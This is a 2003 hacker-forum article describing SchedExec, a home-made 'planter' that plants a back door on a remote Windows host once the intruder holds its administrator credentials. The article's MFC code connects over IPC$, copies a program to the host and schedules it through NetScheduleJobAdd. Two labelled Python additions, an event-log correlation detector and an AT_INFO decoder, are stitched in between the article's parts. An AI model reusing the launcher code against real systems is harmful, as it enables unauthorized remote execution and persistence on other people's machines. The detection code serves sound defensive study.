Analysis of the Programming Implementation of the Streamer "Planter"
http://www.xfocus.net
Creation time: 2003-10-01
Article attribute: original
Article submission: inetufo (inetufo_at_fz5fz.org)

Analysis of the Programming Implementation of the Streamer "Planter"
Author: inetufo
Email: inetufo@fz5fz.org
Homepage: http://www.fz5fz.org
After getting the account and password of an administrator on a remote host, we often want to leave ourselves a back door, which means launching our own program on the remote host. The usual approach is a series of commands; there are piles of IPC$ intrusion tutorials online, but those commands are rather cumbersome. Streamer's "planter" gives us an automatic way to start a program on a remote host, which is very convenient. But the old version has expired, Xiao Rong has not released a new version, and the cracked versions circulating online all have the same problem. So it is now little more than pretty to look at (I'm not saying Streamer is bad, don't flame me :)), even though the planter really is very convenient. So I decided to write a program that does what the planter does.

Just a few days earlier someone had asked a similar question on our FZ5FZ forum: he posted a large amount of code and then asked what method should be used to start the program. After a while, intuition told me that Streamer's planter must be a module that integrates several network commands, and that its principle is similar to starting a program with the AT command. So I disassembled the AT.EXE program shipped with Windows XP (I use Windows XP; Windows 2000 is the same), looked at the DLL files the program calls, and found through analysis that it uses the NetScheduleJobAdd function from NetApi32.dll. (Of course, you don't have to disassemble it to get this information; many tools can list the modules a program imports, such as the Depends.exe that ships with VC 6.0.) The name of this function alone tells you what it does. In MSDN it is defined as follows:
NetScheduleJobAdd

    NET_API_STATUS NetScheduleJobAdd(
        LPCWSTR Servername,   // DNS name of the remote host, or NULL for the local host
        LPBYTE  Buffer,       // pointer to an AT_INFO structure
        LPDWORD JobId         // receives the ID of the newly added job
    );
The English is simple enough that I don't need to translate it. Note that this function depends on the Schedule service.
OK, that is the key point; now we can write our own "lightweight planter". I have named it SchedExec (because it relies on the Schedule service to start the program).
While writing the whole program, I think the hardest part was not the functional code but the interface code. Oh well, the functional part is actually simple to implement. Let's look at the several important functions.
First, establish an IPC connection with the remote host. This is done with the function

    DWORD WNetAddConnection2(
        LPNETRESOURCE lpNetResource,  // pointer to a NETRESOURCE structure
        LPCTSTR lpPassword,           // pointer to the password
        LPCTSTR lpUserName,           // pointer to the user name
        DWORD dwFlags                 // options describing the connection
    );
Next, get the time of the remote host. This can be done with the function:

    NET_API_STATUS NetRemoteTOD(
        LPCWSTR UncServerName,  // DNS name of the remote host, or NULL for the local host
        LPBYTE *BufferPtr       // receives a pointer to a TIME_OF_DAY_INFO structure
    );
The file copy part is very simple, so I won't describe it.
Finally, use the NetScheduleJobAdd API function to add a new job.
For details of these functions, please refer to the MSDN documentation.
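Seen from the host being connected to, the four steps just listed (IPC$ logon, remote time query, file copy over an admin share, NetScheduleJobAdd) each leave a record in the Windows Security log, and their tight sequence is what a defender correlates on. The following Python is an added example and is not code from the article or from SchedExec: it runs that correlation over a handful of constructed event records. The event IDs are the real Windows Vista and later Security log IDs (4624 network logon, 5140 share access, 4698 scheduled task created; Windows 2000/XP used 540, 560 and 602 for the same things), the sample records and the 120-second window are assumptions made for the example, and the At<N> task name is the name the Schedule service gives jobs submitted through NetScheduleJobAdd or at.exe.

```python
"""Correlate network logon -> admin share access -> scheduled task creation.

Added example, not part of the article or of SchedExec. Event IDs are the
Windows Security log IDs; every record below is constructed sample data.
"""
import re
from datetime import datetime, timedelta

# Constructed sample events in arrival order (not from any real host).
SAMPLE_EVENTS = [
    {"time": "2003-10-01T04:55:02", "id": 4624, "logon_type": 3,
     "account": "Administrator", "src_ip": "192.0.2.10"},
    {"time": "2003-10-01T04:55:02", "id": 5140, "account": "Administrator",
     "src_ip": "192.0.2.10", "share": r"\\*\IPC$"},
    {"time": "2003-10-01T04:55:03", "id": 5140, "account": "Administrator",
     "src_ip": "192.0.2.10", "share": r"\\*\ADMIN$"},
    {"time": "2003-10-01T04:55:04", "id": 4698, "account": "Administrator",
     "task_name": r"\At1", "command": r"C:\WINDOWS\Temp\example.exe"},
    # Benign noise: a nightly task created locally by a service account.
    {"time": "2003-10-01T08:30:00", "id": 4698, "account": "backup_svc",
     "task_name": r"\Backup\Nightly", "command": r"C:\Tools\backup.cmd"},
    {"time": "2003-10-01T09:00:00", "id": 4624, "logon_type": 3,
     "account": "jdoe", "src_ip": "192.0.2.55"},
]

# Jobs submitted through NetScheduleJobAdd (and at.exe) are named At<N>.
AT_JOB_NAME = re.compile(r"^\\?At\d+$")
ADMIN_SHARES = ("IPC$", "ADMIN$", "C$")
WINDOW = timedelta(seconds=120)  # assumed tuning value for this example


def _ts(event):
    return datetime.fromisoformat(event["time"])


def _recent(events, before, window, **match):
    """Events whose fields equal *match*, timestamped in [before - window, before]."""
    hits = []
    for e in events:
        if all(e.get(k) == v for k, v in match.items()):
            delta = before - _ts(e)
            if timedelta(0) <= delta <= window:
                hits.append(e)
    return hits


def correlate(events, window=WINDOW):
    """One alert per scheduled-task creation that was preceded, within *window*,
    by a network logon of the same account; the evidence is attached."""
    events = sorted(events, key=_ts)
    alerts = []
    for task in (e for e in events if e["id"] == 4698):
        when = _ts(task)
        acct = task["account"]
        logons = _recent(events, when, window, id=4624, logon_type=3, account=acct)
        if not logons:
            continue  # created locally or by another principal: not this pattern
        shares = [e for e in _recent(events, when, window, id=5140, account=acct)
                  if e.get("share", "").upper().endswith(ADMIN_SHARES)]
        reasons = ["scheduled task created shortly after a network logon by the same account"]
        if AT_JOB_NAME.match(task.get("task_name", "")):
            reasons.append("task name has the At<N> form produced by NetScheduleJobAdd")
        if shares:
            reasons.append("admin share access by the same account: "
                           + ", ".join(e["share"] for e in shares))
        alerts.append({
            "time": task["time"],
            "account": acct,
            "task_name": task.get("task_name", ""),
            "command": task.get("command", ""),
            "src_ips": sorted({e["src_ip"] for e in logons}),
            "shares": [e["share"] for e in shares],
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"{a['time']} {a['account']} {a['task_name']} -> {a['command']}")
        for r in a["reasons"]:
            print("   -", r)
```

The logon-to-task window is the load-bearing part: a tool like the one described here does all four steps within seconds, whereas an administrator creating a task by hand is rarely that fast, and a task created by a purely local principal produces no matching network logon at all. The At<N> name is a strong secondary signal because almost nothing but the legacy AT interface produces it.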
Below is the code fragment that implements the functionality (since this is an MFC GUI program, it is impossible to put all the code in the article; you can download the full project from our homepage).
    // Message handler for the Start button; the program's functionality is implemented here.
    void CIpcToolsDlg::OnStart()
    {
        UpdateData();
        CPromptDlg promptDlg;
        BOOL bFileExist = FALSE;   // TRUE when the file is already on the remote host
        if (m_strIPAddress.IsEmpty() || m_strUserName.IsEmpty())
        {
            promptDlg.m_strMessage = _T("Please fill in the IP, user name and password.");
            promptDlg.DoModal();
            return;
        }
        if (m_strLocalFile.IsEmpty())
        {
            CFileDlg dlg;
            dlg.m_strMessage = _T("Is the file already there?");
            if (dlg.DoModal() == IDCANCEL)
                return;
            else
                bFileExist = TRUE;
        }
        if (m_strStartCmd.IsEmpty())
        {
            promptDlg.m_strMessage = _T("Please specify the program you want to run.");
            promptDlg.DoModal();
            return;
        }
        // Establish the IPC connection with a custom function (a wrapper around WNetAddConnection2)
        BOOL bRet = ConnectIPC((TCHAR *)(LPCTSTR)m_strIPAddress, (LPCTSTR)m_strUserName, (LPCTSTR)m_strPassword);
        if (bRet == FALSE)
        {
            DisconnectIPC((TCHAR *)(LPCTSTR)m_strIPAddress);
            for (int i = 1; i <= 50; i++)
                m_Progress.SetPos(i);
            promptDlg.m_strMessage = _T("Connection failed.");
            if (promptDlg.DoModal() == IDOK)
                m_Progress.SetPos(0);
            return;
        }
        LPTIME_OF_DAY_INFO pBuf = NULL;
        NET_API_STATUS nStatus;
        nStatus = NetRemoteTOD(m_strIPAddress.AllocSysString(), (LPBYTE *)&pBuf);  // Get the time of the remote host
        if (nStatus != NERR_SUCCESS)
        {
            DisconnectIPC((TCHAR *)(LPCTSTR)m_strIPAddress);
            for (int i = 1; i <= 100; i++)
                m_Progress.SetPos(i);
            promptDlg.m_strMessage = _T("Failed to get the remote host time.");
            if (promptDlg.DoModal() == IDOK)
                m_Progress.SetPos(0);
            return;
        }
        // Copy out the fields we need, then release the API buffer. (The original
        // freed pBuf here and went on reading through the freed pointer below.)
        TIME_OF_DAY_INFO tod;
        memset(&tod, 0, sizeof(tod));
        if (pBuf != NULL)
        {
            tod = *pBuf;
            NetApiBufferFree(pBuf);
        }
        CString strRemoteFile = _T("\\\\") + m_strIPAddress + _T("\\") + m_strRemoteFile;
        if (!bFileExist)
        {
            bRet = ::CopyFile((LPCTSTR)m_strLocalFile, (LPCTSTR)strRemoteFile, FALSE);  // Copy the file to the remote host
            if (!bRet)
            {
                DWORD dwRet = GetLastError();   // read it before any other call can overwrite it
                DisconnectIPC((TCHAR *)(LPCTSTR)m_strIPAddress);
                for (int i = 1; i <= 150; i++)
                    m_Progress.SetPos(i);
                CString strMessage;
                strMessage.Format(_T("(%lu)"), dwRet);
                strMessage = _T("Copying file ") + strRemoteFile + _T(" failed ") + strMessage;
                promptDlg.m_strMessage = strMessage;
                if (promptDlg.DoModal() == IDOK)
                    m_Progress.SetPos(0);
                return;
            }
        }
        // Convert the remote host's UTC time to its local time (tod_timezone is minutes west of UTC)
        int nLocalHour = (int)tod.tod_hours + (int)(-tod.tod_timezone) / 60;
        CTime tm(tod.tod_year, tod.tod_month, tod.tod_day, nLocalHour, tod.tod_mins, tod.tod_secs);
        // DaysOfMonth is a bit mask: bit 0 = the 1st, bit 1 = the 2nd, ...
        DWORD day = 1;
        for (int i = 1; i < tm.GetDay(); i++)
            day = day * 2;
        DWORD dwJobId = 0;
        AT_INFO ai;
        memset(&ai, 0, sizeof(ai));
        // Assign a value to each member of the AT_INFO structure
        ai.Command = m_strStartCmd.AllocSysString();
        ai.DaysOfMonth = day;
        ai.DaysOfWeek = 0;
        ai.Flags = JOB_NONINTERACTIVE;
        // Milliseconds after midnight, one minute past the remote host's current local time
        ai.JobTime = ((nLocalHour % 24) * 60 * 60 * 1000) + (tod.tod_mins + 1) * 60 * 1000;
        nStatus = NetScheduleJobAdd(m_strIPAddress.AllocSysString(), (LPBYTE)&ai, &dwJobId);  // Add the job
        if (nStatus == NERR_SUCCESS)
        {
            DisconnectIPC((TCHAR *)(LPCTSTR)m_strIPAddress);
            for (int i = 1; i <= 1000; i++)
                m_Progress.SetPos(i);
            promptDlg.m_strMessage = _T("The specified program will start in 60 seconds.");
            if (promptDlg.DoModal() == IDOK)
                m_Progress.SetPos(0);
            return;
        }
        else
        {
            DisconnectIPC((TCHAR *)(LPCTSTR)m_strIPAddress);
            for (int i = 1; i <= 200; i++)
                m_Progress.SetPos(i);
            CString strMessage;
            strMessage.Format(_T("(%lu)"), nStatus);   // NetScheduleJobAdd returns the error code itself
            strMessage = _T("Starting the process failed ") + strMessage;
            promptDlg.m_strMessage = strMessage;
            if (promptDlg.DoModal() == IDOK)
                m_Progress.SetPos(0);
            return;
        }
    }

One last note: the earlier build failed to start the program when it was run just before 0:00. The program has now been fixed; anyone who needs it can download it again from our homepage. If you have any questions, please contact me. I wish you all a happy National Day. I should sleep; I haven't stayed up this late for a long time :).

Inetufo, written at 5 am on 2003-10-01.

About us: FZ5FZ is mainly engaged in learning and research on network and system security and in-depth analysis and discussion of programming technology; we insist on original work and pursue sharing. FZ5FZ homepage: http://www.fz5fz.org
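The JobTime and DaysOfMonth arithmetic in OnStart() above, and the midnight failure the author mentions, are easier to see with the encodings written out. The following Python is an added example, not code from the article or from SchedExec: remote_local_time() reproduces the article's conversion of the TIME_OF_DAY_INFO fields to the remote host's local time, article_job_time() reproduces the JobTime formula used above, and decode_at_info() turns AT_INFO fields back into the schedule they express, which is what an analyst reading a recovered job or a captured NetScheduleJobAdd call needs. The field names and flag values are those of the Windows lmat.h and lmremutl.h headers; the sample values are constructed.

```python
"""Decode TIME_OF_DAY_INFO and AT_INFO values.

Added example, not part of the article or of SchedExec. Field and flag names
follow the Windows headers; SAMPLE_TOD is constructed data.
"""
from datetime import datetime, timedelta

MS_PER_MIN = 60 * 1000
MS_PER_DAY = 24 * 60 * MS_PER_MIN

# AT_INFO.Flags bits (lmat.h)
AT_FLAGS = {
    0x01: "JOB_RUN_PERIODICALLY",
    0x02: "JOB_EXEC_ERROR",
    0x04: "JOB_RUNS_TODAY",
    0x08: "JOB_ADD_CURRENT_DATE",
    0x10: "JOB_NONINTERACTIVE",
}
WEEKDAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]  # DaysOfWeek bit 0 = Monday

# Constructed TIME_OF_DAY_INFO: a host in UTC+8 (tod_timezone is minutes west of
# UTC, so -480) reporting 30 September 2003, 15:59:30 UTC, i.e. 23:59:30 local.
SAMPLE_TOD = {"tod_year": 2003, "tod_month": 9, "tod_day": 30,
              "tod_hours": 15, "tod_mins": 59, "tod_secs": 30, "tod_timezone": -480}


def remote_local_time(tod):
    """Local wall-clock time of the remote host; the date and time fields are UTC."""
    utc = datetime(tod["tod_year"], tod["tod_month"], tod["tod_day"],
                   tod["tod_hours"], tod["tod_mins"], tod["tod_secs"])
    return utc - timedelta(minutes=tod["tod_timezone"])


def article_job_time(tod):
    """JobTime exactly as OnStart() computes it: one minute past the remote local
    time, in milliseconds since midnight, with C-style truncating division."""
    local_hour = tod["tod_hours"] + int(-tod["tod_timezone"] / 60)
    return (local_hour % 24) * 60 * MS_PER_MIN + (tod["tod_mins"] + 1) * MS_PER_MIN


def decode_at_info(job_time, days_of_month, days_of_week, flags):
    """Readable schedule for an AT_INFO. 'valid' is False when a field is outside
    what the encoding can express: JobTime must be below 24 h, DaysOfMonth may only
    use bits 0..30 and DaysOfWeek bits 0..6."""
    problems = []
    if not 0 <= job_time < MS_PER_DAY:
        problems.append(f"JobTime {job_time} ms is outside 0..{MS_PER_DAY - 1}")
    if days_of_month >> 31:
        problems.append("DaysOfMonth uses bit 31, which has no day")
    if days_of_week >> 7:
        problems.append("DaysOfWeek uses a bit above 6")
    minutes, ms = divmod(job_time, MS_PER_MIN)
    hours, minutes = divmod(minutes, 60)
    return {
        "time": f"{hours % 24:02d}:{minutes:02d}" + (f".{ms}" if ms else ""),
        "days_of_month": [bit + 1 for bit in range(31) if days_of_month >> bit & 1],
        "days_of_week": [WEEKDAYS[bit] for bit in range(7) if days_of_week >> bit & 1],
        "flags": [name for bit, name in AT_FLAGS.items() if flags & bit],
        "valid": not problems,
        "problems": problems,
    }


if __name__ == "__main__":
    print("remote local time:", remote_local_time(SAMPLE_TOD))
    # At 23:59 local the article's formula yields exactly 24 h, which no job can express.
    print(decode_at_info(article_job_time(SAMPLE_TOD), 1 << 29, 0, 0x10))
```

Run against SAMPLE_TOD, article_job_time() returns 86,400,000 ms, one full day, because the hour term is taken modulo 24 but the extra minute is added afterwards; that is the case the author describes as failing just before 0:00, and decode_at_info() reports it as invalid rather than silently wrapping it to 00:00.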